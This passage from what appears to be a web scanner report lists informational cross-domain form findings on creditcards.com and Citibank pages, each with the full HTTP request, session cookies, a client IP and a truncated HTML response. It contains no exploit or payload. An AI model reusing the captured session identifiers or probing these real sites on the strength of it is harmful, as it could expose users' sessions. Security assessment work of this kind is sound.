The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET / HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311924490%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.creditcards.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:49 GMT
Server: Apache
Content-Type: text/html
Content-Length: 102122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<div class="module">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2128253', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">

<a target="_blank" href="http://feeds.feedburner.com/Taking_Charge">
...[SNIP]...

14.2. http://blogs.creditcards.com/fine-print/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/fine-print/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET /fine-print/ HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:29 GMT
Server: Apache
Content-Type: text/html
Content-Length: 101644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<div class="module">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2128253', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">

<a target="_blank" href="http://feeds.feedburner.com/Taking_Charge">
...[SNIP]...

14.3. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:32 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734" method="post">

</form>
...[SNIP]...

14.4. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:56 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63" method="post">

</form>
...[SNIP]...

14.5. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:10 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>
<form name="preFillAppData" action="https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA" method="post">

</form>
...[SNIP]...

14.6. https://online.citibank.com/US/JRS/portal/prefillApps.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://online.citibank.com
Path:	/US/JRS/portal/prefillApps.do

Issue detail

The page contains a form which POSTs data to the domain www.citicards.com. The form contains the following fields:

Request

GET /US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: online.citibank.com
Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529047&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=0000O2LiLgu1O0sXzc7WvVOjgQB:prap5-usgcb2

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:15:00 GMT
Content-type: text/html;charset=ISO-8859-1
P3P: policyref="http://online.citibank.com/w3c/p3p.xml",CP="CAO DSP CUR ADM DEV OUR NOR STP UNIo NAV STA PREi TAI"
Jid: 110617081308150218300514
Cid: prap5-usgcb2
X-ua-compatible: IE=EmulateIE7
Content-language: en-US
Vary: accept-encoding
Content-Length: 529

<html>
<head>
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
</head>
<body>